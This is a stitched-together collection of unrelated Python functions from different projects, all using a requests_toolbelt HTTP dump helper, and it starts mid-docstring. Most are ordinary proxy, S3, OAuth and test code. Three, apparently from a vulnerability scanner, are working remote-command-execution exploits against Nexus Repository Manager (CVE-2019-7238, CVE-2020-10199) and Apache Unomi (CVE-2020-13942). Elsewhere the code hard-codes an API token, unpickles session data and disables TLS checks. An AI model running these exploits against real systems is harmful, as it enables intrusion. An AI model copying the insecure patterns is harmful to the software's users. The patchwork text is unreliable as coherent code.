    failure. (Python 2 code: print statements, pickled session.)
    """
    try:
        # print type(pickle.loads(request.session['current_phenotips_session']))
        # re-construct proxy-ed URL again
        url, parameters = __aggregate_url_parameters(request)
        project_name = request.session['current_project_id']
        uname, pwd = get_uname_pwd_for_project(project_name)
        # SECURITY NOTE(review): pickle.loads on session data -- safe only
        # if the session store is fully trusted.
        curr_session = pickle.loads(
            request.session['current_phenotips_session'])
        logger.info("===> POSTING to url: " + url)
        logger.info("===> DATA: " + str(dict(request.POST)))
        logger.info("===> SESSION - headers: " + str(curr_session.headers))
        logger.info("===> SESSION - cookies: " + str(curr_session.cookies))
        logger.info("===> SESSION - auth: " + str(curr_session.auth))
        import requests
        #response = requests.post(url, headers=curr_session.headers, cookies=curr_session.cookies, auth=curr_session.auth)
        response = curr_session.post(url, data=dict(request.POST))
        from requests_toolbelt.utils import dump
        data = dump.dump_all(response)
        logger.info("===> dump - original:\n" + data.decode('utf-8'))
        http_response = HttpResponse(response.content)
        for header in response.headers.keys():
            if header != 'connection' and header != 'Transfer-Encoding':
                # these hop-by-hop headers are not allowed by Django
                http_response[header] = response.headers[header]
        # persist outside of PhenoTips db as well
        if len(request.POST) != 0:
            patient_id = request.session['current_patient_id']
            __process_sync_request_helper(
                patient_id, request.user, project_name, parameters,
                pickle.loads(request.session['current_phenotips_session']))
        logger.info("===> original api - HTTP RESPONSE DICT: ")
        for k, v in http_response.__dict__.items():
            logger.info("===> %s: %s" % (k, v))
        return http_response
    except Exception as e:
        print 'proxy post error:', e
        logger.error('phenotips.views:' + str(e))
        raise Http404
def s3_put(host='127.0.0.1', port='7480', cmd='/', access_key='', secret_key='', headers=None, file=None, content=None, show_dump=False):
    """Issue an S3 PUT (AWS v2 signed) against a radosgw endpoint.

    Depending on the arguments this uploads an object from *file*, uploads
    an object from *content*, or -- with neither -- creates a bucket.
    *headers*, when given, is a JSON string of extra request headers.
    Prints either a full wire dump (show_dump=True) or the response body.

    Fix: the final output used a Python 2-only ``print`` statement,
    inconsistent with the ``print(...)`` call in the other branch; it is
    now parenthesized and works on both Python 2 and 3.
    """
    if headers:
        headers = json.loads(headers)
    url = 'http://%s:%s%s' % (host, port, cmd)
    response = None
    if file:
        with open(file, 'rb') as fin:
            file_content = fin.read()
        # upload object from file
        response = requests.put(url,
                                auth=S3Auth(access_key, secret_key, service_url=host + ":" + port),
                                headers=headers,
                                data=file_content)
    elif content:
        # upload object from content
        response = requests.put(url,
                                auth=S3Auth(access_key, secret_key, service_url=host + ":" + port),
                                headers=headers,
                                data=content)
    else:
        # create bucket
        response = requests.put(url,
                                auth=S3Auth(access_key, secret_key, service_url=host + ":" + port),
                                headers=headers)
    if show_dump:
        data = dump.dump_all(response)
        print(data.decode('utf-8'))
    else:
        print(response.content)
def tempusFindProjectName(TempusProjectName):
    """Look up a Tempus project by exact name and return its numeric id.

    Queries the find-project endpoint with a name filter (first page,
    page size 10), scans the returned ``items`` for an exact name match,
    and returns that item's ``id``. Returns -1 on connection errors;
    implicitly returns None when no exact match is found (original
    behavior kept). Debug output is printed throughout.

    Fixes: ``false``/``true`` were undefined names (NameError at runtime)
    -- replaced with False/True; Python 2-only ``dict.iteritems()``
    replaced with ``items()``; the final ``== true`` comparison replaced
    with a plain truthiness test.
    """
    try:
        # Get Project Name and then the Swag value
        urlIncludeParams = urlTempusFindProjectName + '?name='
        urlIncludeParams += TempusProjectName
        urlIncludeParams += "&page=1&pageSize=10"
        u = requests.get(urlIncludeParams, headers=headersTempus)
        data = dump.dump_all(u)
        print(data.decode('utf-8'))
        if u.status_code == 200:
            # The JSON response holds paged "items"; multiple rows may
            # match a startsWith-style filter, so compare names exactly.
            nameMatch = False
            entityId = 0
            e = json.loads(u.text)
            for key, value in e.items():
                if key == 'items':
                    myItemsList = value
                    print("myItemList = ", myItemsList)
                    z = 0
                    for s in myItemsList:
                        print("s={0}, i={1}".format(s, z))
                        for key, value in s.items():
                            z = z + 1
                            if key == 'name':
                                # accounting for more than one match of the name
                                print("project name now = {0}".format(value))
                                if TempusProjectName == value:
                                    print(
                                        "value of project name matches {0} vs {1}"
                                        .format(TempusProjectName, value))
                                    nameMatch = True
                            if key == 'id':
                                print("found id")
                                print("id = {0}".format(value))
                                entityId = value
                                print("entityId = {0}".format(entityId))
            if nameMatch:
                return entityId
            else:
                print('failed to locate project in Tempus = %s' % TempusProjectName)
    except ConnectionError as theError:
        print(theError)
        return -1
def cve_2019_7238_poc(self):
    """PoC for Nexus Repository Manager 3 CVE-2019-7238 (JEXL RCE).

    POSTs the prepared JEXL payload (RECOMMAND replaced by
    "echo <random md5>") to /service/extdirect and declares success when
    the marker appears in the response. Results go through
    verify.scan_print(); a thread lock guards the shared self.vul_info.
    """
    self.threadLock.acquire()
    self.vul_info["prt_name"] = "Nexus Repository Manager: CVE-2019-7238"
    self.vul_info["prt_resu"] = "null"
    self.vul_info["prt_info"] = "null"
    self.vul_info["vul_urls"] = self.url
    self.vul_info["vul_payd"] = "null"
    self.vul_info["vul_name"] = "Nexus Repository Manager 3 远程代码执行漏洞"
    self.vul_info["vul_numb"] = "CVE-2019-7238"
    self.vul_info["vul_apps"] = "Nexus"
    self.vul_info["vul_date"] = "2019-03-21"
    self.vul_info["vul_vers"] = "3.6.2 - 3.14.0"
    self.vul_info["vul_risk"] = "high"
    self.vul_info["vul_type"] = "远程代码执行漏洞"
    self.vul_info["vul_data"] = "null"
    self.vul_info["vul_desc"] = "其3.14.0及之前版本中,存在一处基于OrientDB自定义函数的任意JEXL表达式执行功能," \
                                "而这处功能存在未授权访问漏洞,将可以导致任意命令执行漏洞"
    self.vul_info["cre_date"] = "2021-01-27"
    self.vul_info["cre_auth"] = "zhzyker"
    md = random_md5()
    cmd = "echo " + md
    self.payload = self.payload_cve_2019_7238.replace("RECOMMAND", cmd)
    self.headers = {
        'Accept': '*/*',
        'User-agent': self.ua,
        'Content-Type': 'application/json'
    }
    try:
        request = requests.post(self.url + "/service/extdirect",
                                data=self.payload,
                                headers=self.headers,
                                timeout=self.timeout,
                                verify=False)
        if md in request.text:
            self.vul_info["vul_data"] = dump.dump_all(request).decode(
                'utf-8', 'ignore')
            self.vul_info["prt_resu"] = "PoCSuCCeSS"
            self.vul_info["vul_payd"] = cmd
            self.vul_info["prt_info"] = "[rce] [payload: " + cmd + " ]"
        verify.scan_print(self.vul_info)
    except requests.exceptions.Timeout:
        verify.timeout_print(self.vul_info["prt_name"])
    except requests.exceptions.ConnectionError:
        verify.connection_print(self.vul_info["prt_name"])
    except Exception as e:
        verify.error_print(self.vul_info["prt_name"])
    self.threadLock.release()
def cve_2020_10199_exp(self, cmd, u, p):
    """Exploit Nexus Repository Manager 3 CVE-2020-10199 (EL injection).

    Authenticates with base64-encoded credentials *u*/*p* against
    /service/rapture/session, extracts the NXSESSIONID from the response
    headers, then POSTs the stored go-group repository payload. *cmd* is
    carried in a request header named '404' -- presumably referenced by
    the payload's EL expression (TODO confirm against the payload
    template). Prints the dumped exchange via verify.exploit_print.
    """
    vul_name = "Nexus Repository Manager: CVE-2020-10199"
    self.session_headers = {
        'Connection': 'keep-alive',
        'X-Requested-With': 'XMLHttpRequest',
        'X-Nexus-UI': 'true',
        'User-Agent': self.ua
    }
    try:
        # Nexus expects base64-encoded username/password form fields.
        self.us = base64.b64encode(str.encode(u))
        self.pa = base64.b64encode(str.encode(p))
        self.base64user = self.us.decode('ascii')
        self.base64pass = self.pa.decode('ascii')
        self.session_data = {
            'username': self.base64user,
            'password': self.base64pass
        }
        self.request = requests.post(self.url + "/service/rapture/session",
                                     data=self.session_data,
                                     headers=self.session_headers,
                                     timeout=20)
        # Pull NXSESSIONID out of the stringified Set-Cookie headers.
        self.session_str = str(self.request.headers)
        self.session = (re.search(r"NXSESSIONID=(.*); Path", self.session_str).group(1))
        self.rce_headers = {
            'Connection': "keep-alive",
            'NX-ANTI-CSRF-TOKEN': "0.6153568974227819",
            'X-Requested-With': "XMLHttpRequest",
            'X-Nexus-UI': "true",
            'Content-Type': "application/json",
            '404': "" + cmd + "",
            'User-Agent': self.ua,
            'Cookie': "jenkins-timestamper-offset=-28800000; Hm_lvt_8346bb07e7843cd10a2ee33017b3d627=1583249520;" \
                      "NX-ANTI-CSRF-TOKEN=0.6153568974227819; NXSESSIONID=" + self.session + ""
        }
        request = requests.post(self.url + "/service/rest/beta/repositories/go/group",
                                data=self.payload_cve_2020_10199,
                                headers=self.rce_headers)
        self.raw_data = dump.dump_all(request).decode('utf-8', 'ignore')
        verify.exploit_print(request.text, self.raw_data)
    except requests.exceptions.Timeout:
        verify.timeout_print(vul_name)
    except requests.exceptions.ConnectionError:
        verify.connection_print(vul_name)
    except Exception:
        verify.error_print(vul_name)
def get(self, *args, **kwargs):
    """Wrapper around ``self.session.get`` that debug-logs a wire dump.

    The dump is decoded as UTF-8 (errors ignored) and '\\r\\n' is collapsed
    to '\\n' so line endings are not doubled when the log file is written
    on Windows (the dump already carries CRLF, and writing '\\r\\n' through
    a text-mode file there would produce '\\r\\r\\n'). Falls back to logging
    the raw bytes if decoding fails. Returns the Response unchanged.

    Fix: narrowed the bare ``except:`` to ``except Exception`` so
    KeyboardInterrupt/SystemExit are no longer swallowed.
    """
    rsp = self.session.get(*args, **kwargs)
    data = dump.dump_all(rsp)
    try:
        data_str = str(bytes(data), encoding='utf-8', errors='ignore').replace('\r\n', '\n')
        self.logger.debug(data_str)
    except Exception:
        # Best effort: log whatever we have, undecoded.
        self.logger.debug(data)
    return rsp
def cve_2020_13942(self):
    """PoC for Apache Unomi CVE-2020-13942 (MVEL/OGNL injection RCE).

    POSTs the prepared payload (RECOMMAND replaced by self.CMD) to
    /context.json and inspects trackedConditions[0].parameterValues.pagePath
    in the JSON reply to judge the result. NOTE(review): the Host header
    is hard-coded to '34.87.38.169:8181' -- looks like leftover test data;
    confirm it should not follow self.url.
    """
    self.pocname = "Apache Unomi: CVE-2020-13942"
    self.method = "post"
    self.rawdata = "null"
    self.info = CodeTest.Colored_.rce()
    self.r = "PoCWating"
    self.payload = self.payload_cve_2020_13942.replace(
        "RECOMMAND", self.CMD)
    self.headers = {
        'Host': '34.87.38.169:8181',
        'User-Agent': "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0",
        'Accept': '*/*',
        'Connection': 'close',
        'Content-Type': 'application/json'
    }
    try:
        self.request = requests.post(self.url + "/context.json",
                                     data=self.payload,
                                     headers=self.headers,
                                     timeout=TIMEOUT,
                                     verify=False)
        self.rawdata = dump.dump_all(self.request).decode(
            'utf-8', 'ignore')
        self.rep = list(
            json.loads(self.request.text)
            ["trackedConditions"])[0]["parameterValues"]["pagePath"]
        if CodeTest.VULN == None:
            if r"/tracker/" in self.rep:
                self.r = "PoCSuSpEct"
                CodeTest.verify.generic_output(self.r, self.pocname, self.method, self.rawdata, self.info)
        else:
            # Blind execution: no output channel, so only report that the
            # request went through.
            self.r = "Command Executed Successfully (But No Echo)"
            CodeTest.verify.generic_output(self.r, self.pocname, self.method, self.rawdata, self.info)
    except requests.exceptions.Timeout as error:
        CodeTest.verify.timeout_output(self.pocname)
    except requests.exceptions.ConnectionError as error:
        CodeTest.verify.connection_output(self.pocname)
    except Exception as error:
        CodeTest.verify.generic_output(str(error), self.pocname, self.method, self.rawdata, self.info)
def get_api_token(self):
    """Request an OAuth password-grant token and return the access token.

    Prints a full wire dump when self.debug is set. On HTTP 401 the
    error description is printed and None is returned. TLS verification
    is disabled, matching the original behavior.
    """
    form = {
        'response_type': 'token',
        'grant_type': 'password',
        'username': self.client_key,
        'password': self.client_secret,
        'client_id': self.client_id,
        'redirect_uri': self.callback_url,
    }
    resp = requests.post(self.token_url, data=form, verify=False)
    if self.debug:
        print(dump.dump_all(resp).decode('utf-8'))
    if resp.status_code == 401:
        print('Error: {}'.format(resp.json()['error_description']))
        return None
    return resp.json()['access_token']
def on_click(self): """ クリック時 """ r = self.communicate() rawstr = dump.dump_all(r) print r.headers['Content-Type'] try: self.inside('raw_TextView.raw').setPlainText(rawstr.decode('utf-8')) except Exception as e: print str(e) #self.inside('response_GetView.widget').deleteLater() if r.status_code == 200: print "content-length : %s" % len(r.content) self.content_view(rawstr, r.headers['Content-Type'], r)
def test_dump_all(self):
    """A dump of a 5-hop redirect must contain every request and Location hop."""
    session = requests.Session()
    recorder = get_betamax(session)
    with recorder.use_cassette('redirect_request_for_dump_all'):
        response = session.get('https://httpbin.org/redirect/5')

    dumped = dump.dump_all(response)

    # Each hop of the redirect chain, in order: the outgoing request
    # line ('<') and the Location header it was answered with ('>').
    expected_fragments = (
        b'< GET /redirect/5 HTTP/1.1\r\n',
        b'> Location: /relative-redirect/4\r\n',
        b'< GET /relative-redirect/4 HTTP/1.1\r\n',
        b'> Location: /relative-redirect/3\r\n',
        b'< GET /relative-redirect/3 HTTP/1.1\r\n',
        b'> Location: /relative-redirect/2\r\n',
        b'< GET /relative-redirect/2 HTTP/1.1\r\n',
        b'> Location: /relative-redirect/1\r\n',
        b'< GET /relative-redirect/1 HTTP/1.1\r\n',
        b'> Location: /get\r\n',
        b'< GET /get HTTP/1.1\r\n',
    )
    for fragment in expected_fragments:
        assert fragment in dumped
def debugRequest(self, req):
    """Best-effort debug print of a full request/response dump.

    Failures (e.g. undecodable binary bodies) are silently ignored so
    debugging output can never break the caller.
    """
    try:
        print (dump.dump_all(req).decode('utf-8'))
    except Exception:
        # BUGFIX: was a bare `except:`, which also swallows SystemExit
        # and KeyboardInterrupt.
        pass
#"Ватикан", "Сан-Марино", "Вадуц", "Лобамба", "Люксембург", "Паликир", "Маджуро", "Фунафути", "Мелекеок", "Бир-Лелу", "Монако", "Тарава", "Морони", "Андорра-ла-Велья", "Порт-оф-Спейн", "Кигали", "Мбабане", "Джуба", "Гаага", "Любляна", "Братислава", "Доха", "Подгорица", "Шри-Джаяварденепура-Котте", "Багио", "Додома", "Берн", "Эль-Аюн", "Приштина", "Розо", "Джибути", "Путраджая", "Киото", "Банжул", "Скопье", "Бриджтаун", "Порто-Ново", "Бужумбура", "Кингстаун", "Кастри", "Бастер", "Порт-Луи", "Сент-Джорджес", "Манама", "Сент-Джонс", "Монтевидео", "Ломе", "Тунис", "Абу-Даби", "Ашхабад", "Лусака", "Хараре", "Дили", "Порт-Вила", "Тегусигальпа", "Джорджтаун", "Рейкьявик", "Порт-о-Пренс", "Кампала", "Парамарибо", "Ниамей", "Душанбе", "Асунсьон", "Манагуа", "Фритаун", "Исламабад", "Катманду", "Блумфонтейн", "Претория", "Порт-Морсби", "Хониара", "Панама", "Рабат", "Кишинёв", "Мапуту", "Могадишо", "Маскат", "Коломбо", "Улан-Батор", "Виндхук", "Абуджа", "Бисау", "Амман", "Вильнюс", "Рига", "Бишкек", "Масеру", "Антананариву", "Кито", "Сан-Хосе", "Сан-Сальвадор", "Кингстон", "Нджамена", "Малабо", "Асмэра", "Загреб", "Таллин", "Лилонгве", "Гватемала", "Либревиль", "Сува", "Вальпараисо", "Нуакшот", "Бамако", "Бейрут", "Тбилиси", "Астана", "Вьентьян", "Браззавиль", "Конакри", "Ямусукро", "Оттава", "Белград", "Бандар-Сери-Бегаван", "Сукре", "Бельмопан", "Банги", "Яунде", "Тирана", "Ереван", "Баку", "Пномпень", "Ла-Пас", "Котону", "София", "Минск", "Тхимпху", "Габороне", "Канберра", "Уагадугу", "Сараево", "Нейпьидо", "Нукуалофа", "Харгейса", "Виктория", "Сан-Томе", "Апиа", "Валлетта", "Мале", "Иерусалим", "Прая", "Нассау", "Никосия", "Веллингтон", "Ханой", "Анкара", "Будапешт", "Сана", "Бухарест", "Дамаск", "Лиссабон", "Хартум", "Осло", "Варшава", "Пхеньян", "Дар-эс-Салам", "Дублин", "Монровия", "Куала-Лумпур", "Гавана", "Прага", "Эль-Кувейт", "Санто-Доминго", "Аккра", "Триполи", "Тель-Авив", "Хельсинки", "Копенгаген", "Абиджан", "Бразилиа", "Брюссель", "Дакка", "Луанда", "Алжир", 
"Янгон", "Сан-Франциско", "Денвер", "Хьюстон", "Майами", "Атланта", "Чикаго", "Каракас", "Киев", "Дубай", "Ташкент", "Мадрид", "Женева", "Стокгольм", "Бангкок", "Лима", "Дакар", "Йоханнесбург", "Амстердам", "Касабланка", "Сеул", "Манила", "Монтеррей", "Берлин", "Урумчи", "Чэнду", "Осака", "Киншаса", "Нью-Дели", "Бангалор", "Афины", "Багдад", "Аддис-Абеба", "Тегеран", "Ванкувер", "Торонто", "Буэнос-Айрес", "Кабул", "Вена", "Мельбурн", "Тайбэй", "Окленд", "Лос-Анджелес", "Вашингтон", "Нью-Йорк", "Лондон", "Стамбул", "Эр-Рияд", "Кейптаун", "Москва", "Мехико", "Лагос", "Рим", "Пекин", "Найроби", "Джакарта", "Богота", "Каир", "Шанхай", "Токио", "Мумбаи", "Париж", "Сантьяго", "Калькутта", "Рио-де-Жанейро", "Сан-Паулу", "Сидней", "Сингапур", "Гонконг" ]; def find_coord(j): for s in j["suggestions"]: if s["data"].get("geo_lon"): lon = s["data"]["geo_lon"] lat = s["data"]["geo_lat"] return (lon, lat) return (None, None) for city in cities: url = "https://suggestions.dadata.ru/suggestions/api/4_1/rs/suggest/address" headers = { "Content-Type": "application/json", "Accept": "application/json", "Authorization": "Token a21ae8d8246ebf44e4c99a8dd9e6786d3a56ca0a"} data = { "query": city, "count":"10", "locations": [ { "country": "*" }] } data = json.dumps(data) r = requests.post(url, data=data, params=data, headers=headers) data = dump.dump_all(r) j = r.json() (lon, lat) = find_coord(j) if lon is not None: print('"{}": ["{}", "{}"],'.format(city, lat, lon))
def requests_response_json(
    response,
    request_curl,
    request_label=None,
    raise_ex_if_not_json_response=True,
):
    """Extract and validate the JSON body of a requests response.

    Args:
        response: Response object returned by the requests library.
        request_curl: curl representation of the originating request,
            attached to any raised error for reproducibility.
        request_label: Optional label added to structured log context.
        raise_ex_if_not_json_response: When True, an unparsable or
            missing JSON body raises RequestsFortifiedModuleError;
            when False it is only logged.

    Returns:
        The decoded JSON payload, or None when decoding failed and
        raising is disabled.
    """
    extra = {}
    if request_label:
        extra.update({'request_label': request_label})

    parsed = None
    try:
        parsed = response.json()
        extra.update({
            'response_details_source': 'json',
            'response_content_length': len(parsed),
        })
    except ValueError as decode_err:
        # requests signals malformed JSON bodies with ValueError
        # (JSONDecodeError is a subclass).
        log.error("Validate JSON Response: Failed: JSONDecodeError", extra=extra)
        pprint(dump.dump_all(response).decode('utf-8'))
        pprint(response.text)
        handle_json_decode_error(
            response_decode_ex=decode_err,
            response=response,
            response_extra=extra,
            request_label=request_label,
            request_curl=request_curl,
        )
    except Exception as unexpected_err:
        log.error("Validate JSON Response: Failed: Exception", extra=extra)
        pprint(response.text)
        handle_json_decode_error(
            response_decode_ex=unexpected_err,
            response=response,
            response_extra=extra,
            request_label=request_label,
            request_curl=request_curl,
        )

    if parsed is None:
        if raise_ex_if_not_json_response:
            log.error("Validate JSON Response: Failed: None", extra=extra)
            raise RequestsFortifiedModuleError(
                error_message="Validate JSON Response: Failed: None",
                error_request_curl=request_curl,
                error_code=RequestsFortifiedErrorCodes.REQ_ERR_SOFTWARE,
            )
        log.warning("Validate JSON Response: None", extra=extra)
    else:
        log.debug("Validate JSON Response: Valid", extra=extra)

    return parsed
def proxy_request(request, url, host=None, scheme=None, method=None,
                  session=None, headers=None, auth_tuple=None, verify=True,
                  filter_request_headers=False, stream=False, data=None,
                  verbose=False):
    """Proxy a django request to another HTTP server.

    Args:
        request (object): Django request object
        url (string): either a full url or a path relative to 'host'
        host (string): "hostname:port" or "ip-address:port" of target server
        scheme (string): "http" or "https"
        method (string): HTTP request method. Currently supports "GET",
            "POST", "PUT", "HEAD", "DELETE"
        session (object): requests library Session object
        headers (dict): a dictionary of HTTP request headers to submit
            instead of the headers in request.META
        auth_tuple (2-tuple): ("username", "password") tuple for basic auth
        verify (bool): whether to validate SSL certificates (setting this
            to False is not recommended, but can be done for backend
            servers that require https, but use self-signed certificates)
        filter_request_headers (bool): if True, headers listed in
            EXCLUDE_HTTP_REQUEST_HEADERS (e.g. 'Connection', 'X-Real-Ip',
            'X-Forwarded-Host') will not be proxied
        stream (bool): whether the requests library should stream the
            response (see: http://docs.python-requests.org/en/master/user/advanced/#body-content-workflow)
        data (string): request body - used for POST, PUT, etc.
        verbose (bool): log request and response details

    Returns:
        django.http.HttpResponse: The response returned by the target http
        server, wrapped in a Django HttpResponse object.

    Raises:
        ValueError: for a relative url that does not start with '/', a
            relative url without a host, or an unsupported HTTP method.
    """
    # Fall back to attributes of the incoming Django request.
    method = method if method is not None else request.method
    scheme = scheme if scheme is not None else request.scheme
    auth = HTTPBasicAuth(*auth_tuple) if auth_tuple is not None else None
    headers = headers if headers is not None else _convert_django_META_to_http_headers(request.META)
    headers['Host'] = host if host is not None else headers.get('Host')
    if filter_request_headers:
        headers = {k: v for k, v in headers.items()
                   if k.lower() not in EXCLUDE_HTTP_REQUEST_HEADERS}
    if not url.startswith("http"):
        # Relative url: must be an absolute path on an explicit host.
        if not url.startswith("/"):
            raise ValueError("%s url doesn't start with /" % url)
        if not host:
            raise ValueError("%s url is a path but no host is specified" % url)
        url = "%s://%s%s" % (scheme, host, url)
    if verbose:
        logger.info("Sending %(method)s request to %(url)s" % locals())
        if headers:
            logger.info(" headers:")
            for key, value in sorted(headers.items(), key=lambda i: i[0]):
                logger.info("---> %(key)s: %(value)s" % locals())
        if data:
            logger.info(" data: %(data)s" % locals())
        if auth_tuple:
            logger.info(" auth: %(auth_tuple)s" % locals())
    r = session if session is not None else requests.Session()
    # Dispatch table instead of an if/elif chain.
    method_impls = {
        "GET": r.get,
        "POST": r.post,
        "PUT": r.put,
        "HEAD": r.head,
        "DELETE": r.delete,
    }
    try:
        method_impl = method_impls[method]
    except KeyError:
        # BUGFIX: the original message embedded a raw line break in the
        # format string.
        raise ValueError("Unexpected HTTP method: %s. %s" % (method, url))
    response = method_impl(url, headers=headers, data=data, auth=auth,
                           stream=stream, verify=verify)
    response_content = response.raw.read() if stream else response.content
    if stream:
        # make sure the connection is released back to the connection pool
        # (based on http://docs.python-requests.org/en/master/user/advanced/#body-content-workflow)
        response.close()
    proxy_response = HttpResponse(
        content=response_content,
        status=response.status_code,
        reason=response.reason,
        charset=response.encoding
    )
    if verbose:
        if not stream:
            # BUGFIX: decode the dump instead of logging the bytes repr.
            dumped = dump.dump_all(response)
            logger.info("===> dump - response_data:\n" + dumped.decode('utf-8', 'ignore'))
        logger.info(" response: <Response: %s> %s" % (response.status_code, response.reason))
        logger.info(" response-headers:")
        for key, value in sorted(response.headers.items(), key=lambda i: i[0]):
            logger.info("<--- %(key)s: %(value)s" % locals())
    # BUGFIX: .iteritems() is Python 2 only and raises AttributeError on
    # Python 3; the rest of this function already uses py3 idioms.
    for key, value in response.headers.items():
        if key.lower() not in EXCLUDE_HTTP_RESPONSE_HEADERS:
            proxy_response[key.title()] = value
    return proxy_response
def debugRequest(req):
    """Best-effort debug print of a full request/response dump.

    Failures (e.g. undecodable binary bodies) are silently ignored so
    debugging output can never break the caller.
    """
    try:
        print(dump.dump_all(req).decode('utf-8'))
    except Exception:  # noqa
        # BUGFIX: was a bare `except:`, which also swallows SystemExit
        # and KeyboardInterrupt.
        pass